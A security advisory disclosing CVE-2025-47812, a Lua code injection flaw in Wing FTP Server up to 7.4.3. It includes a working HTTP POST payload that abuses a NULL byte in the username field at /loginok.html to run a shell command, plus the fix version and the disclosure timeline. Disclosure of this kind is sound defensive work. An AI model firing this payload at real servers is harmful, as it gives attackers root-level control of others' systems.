Wing FTP Server Arbitrary Code Injection in User Session Files Leading to Remote Code Execution.

ADVISORY INFORMATION

• Product: Wing FTP Server
• Vendor URL: https://www.wftpserver.com
• CWE: Code Injection [CWE-94]
• Date found: 2025-05-12
• Date published: 2025-06-30
• CVSSv4 Score: 10.0 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
• CVE: CVE-2025-47812

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

WingFTP Server <= 7.4.3

INTRODUCTION

Wing FTP Server is a free, easy-to-use, and secure FTP server software for Windows, Linux, and Mac OS. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. And it provides admins with a web-based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The endpoint at “/loginok.html” does not properly handle NULL bytes when processing the “username” parameter. This allows attackers to inject arbitrary Lua code into user session files.

Successful exploits can allow an unauthenticated attacker to execute arbitrary commands on the underlying server. Since Wing FTP runs as root on Linux and NT AUTHORITY/SYSTEM on Windows, by default, this essentially means the total compromise of the underlying server. If the FTP allows anonymous users, this can also be considered a fully unauthenticated Remote Code Execution.

For a detailed write-up, see the referenced blog post.

PROOF OF CONCEPT

A payload to exploit this vulnerability looks like the following:

POST /loginok.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 121

username=anonymous%00]]%0dlocal+h+%3d+io.popen("id")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=correct

SOLUTION

Update to version 7.4.4

REPORT TIMELINE

• 2025-05-10: Discovery of the vulnerability
• 2025-05-10: MITRE assigns CVE-2025-47812
• 2025-05-12: Contacted the vendor via their support@
• 2025-05-12: Vendor confirms the issue as a critical bug
• 2025-05-14: Vendor releases version 7.4.4 which fixes the vulnerability
• 2025-05-14: Vendor asks to extend the disclosure date by one month
• 2025-05-15: RCE Security states that the planned disclosure date which is more than a month ahead is enough
• 2025-06-30: Full Disclosure

REFERENCES

• https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
• https://www.wftpserver.com